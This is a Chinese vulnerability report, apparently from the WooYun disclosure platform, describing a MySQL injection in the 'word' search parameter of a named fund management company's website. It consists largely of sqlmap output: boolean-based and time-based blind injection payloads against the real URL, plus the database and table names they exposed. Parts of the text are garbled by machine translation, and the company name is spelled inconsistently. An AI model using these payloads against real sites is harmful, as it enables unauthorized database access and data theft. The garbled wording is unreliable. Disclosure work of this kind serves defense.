天弘基金主站存在MySql注入

漏洞标题 天弘基金主站存在MySql注入 相关厂商 天弘基金管理有限公司 漏洞作者 丶n 提交时间 2016-06-20 09:04 公开时间 2016-06-21 10:23 漏洞类型 SQL注射漏…

漏洞标题 天鸿基金总站有一个MySql注入 相关制造商 天鸿基金管理有限公司 漏洞作者 丶ñ 提交时间 2016-06-20 09: 04 公共时间 2016-06-21 10: 23 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已修复 标签标签 漏洞详细信息 http://www.thfund.com.cn/ 天虹基金总站 http://www.thfund.com.cn//thfund/fundlist/search/api/?word=e Word参数存在注入 GET参数'word'易受攻击。你想继续测试其他人(如果是 纽约州)? [y/N] y Sqlmap标识以下注入点,总共277个HTTP(s)r 请求: --- 参数:字(GET) 输入:基于布尔值的盲 标题: AND基于布尔的盲 - WHERE或H * ING子句 有效载荷:字=e%'和4468=4468 AND'%'=' 输入:和/或基于时间的盲 标题: MySQL>=5.0.12 AND基于时间的盲(SLEEP) 有效载荷:字=e%'和(SELECT * FROM(SELECT(SLEEP(5)))scvx)AND'%'=' --- [08: 07: 03] [INFO]后端DBMS是MySQL Web应用程序技术: PHP 5.6.20 后端DBMS: MySQL 5.0.12 当前用户:'[电子邮件 受保护]/* \ x1f \ x08' 漏洞证明: 可用数据库[4]: [*] information_schema [*] mysql [*] performance_schema [*] thweb [08: 18: 46] [INFO]后端DBMS是MySQL Web应用程序技术: PHP 5.6.20 后端DBMS: MySQL 5.0.12 [08: 18: 46] [INFO]获取数据库:'thweb'的表 [08: 18: 46] [INFO]获取数据库'thweb'的表数 [08: 18: 46] [警告]以单线程模式运行。请考虑使用o Ption'--threads'用于更快的数据检索 [08: 18: 46] [INFO]检索到: 284 [08: 18: 54] [INFO]检索到: a_content_body [08: 20: 04] [INFO]检索到: a_content_category [08: 20: 54] [INFO]检索到: a_w_content [08: 21: 46] [INFO]检索到: a_w_content_1 [08: 22: 07] [INFO]检索到: aa_channel_category [08: 23: 29] [INFO]检索到: aa_fundday [08: 24: 13] [INFO]检索到: accesslog [08: 25: 00] [INFO]检索到:动作 [08: 25: 27] [INFO]检索到: aliyunoss_file [08: 26: 35] [INFO]检索到: authmap [08: 27: 07] [INFO]检索到:批次 [08: 27: 36] [INFO]检索到: b 如果表太多,它们将无法运行。 修理计划: 参数过滤 版权声明:请注明出处转n @乌云